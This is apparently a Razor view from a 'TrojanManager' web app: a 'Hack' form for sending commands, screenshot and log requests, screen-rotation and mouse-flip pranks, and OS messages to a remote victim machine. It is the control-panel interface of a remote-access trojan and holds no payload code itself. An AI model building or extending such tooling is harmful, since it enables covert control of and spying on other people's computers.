@model TrojanManager.Models.HackCommands

@{
	ViewData["Title"] = "Hack";
}

<h2>Hack</h2>

<h4>HackCommands</h4>
<hr />
<div class="row">
	<div class="col-md-4">
		<form asp-action="Hack">
			<div asp-validation-summary="ModelOnly" class="text-danger"></div>
			<div class="form-group">
				
				<input asp-for="UserId" class="form-control" type="hidden" />
				<span asp-validation-for="UserId" class="text-danger"></span>
			</div>
			<div class="form-group">
				<label  class="control-label">Select an orientation</label>
				<div class="col-md-10">
					@foreach (var item in Model.Orientations)
					{
						<input asp-for="SelectedOrientation" type="radio" value="@item.Id" /> @item.OrientationDegrees
					}
				</div>
			</div>
			<div class="form-group">
				<div class="checkbox">
					<label>
						<input asp-for="FlipMouse" /> @Html.DisplayNameFor(model => model.FlipMouse)
					</label>
				</div>
			</div>
			<div class="form-group">
				<div class="checkbox">
					<label>
						<input asp-for="GetPrintScreen" /> @Html.DisplayNameFor(model => model.GetPrintScreen)
					</label>
				</div>
			</div>
			<div class="form-group">
				<div class="checkbox">
					<label>
						<input asp-for="GetLogs" /> @Html.DisplayNameFor(model => model.GetLogs)
					</label>
				</div>
			</div>
			<div class="form-group">
				<label asp-for="RemoteResponse" class="control-label"></label>
				<span>@Model.RemoteResponse</span>
			</div>
			<div class="form-group">
				<label asp-for="Command" class="control-label"></label>
				<input asp-for="Command" class="form-control" />
				<span asp-validation-for="Command" class="text-danger"></span>
			</div>
			<div class="form-group">
				<label asp-for="OsMessage" class="control-label"></label>
				<input asp-for="OsMessage" class="form-control" />
				<span asp-validation-for="OsMessage" class="text-danger"></span>
			</div>
			<div class="form-group">
				<input type="submit" value="Hack" class="btn btn-default" />
			</div>
		</form>
	</div>
</div>

<div>
	<a asp-action="Index">Back to List</a>
</div>

@section Scripts {
	@{await Html.RenderPartialAsync("_ValidationScriptsPartial");}
}
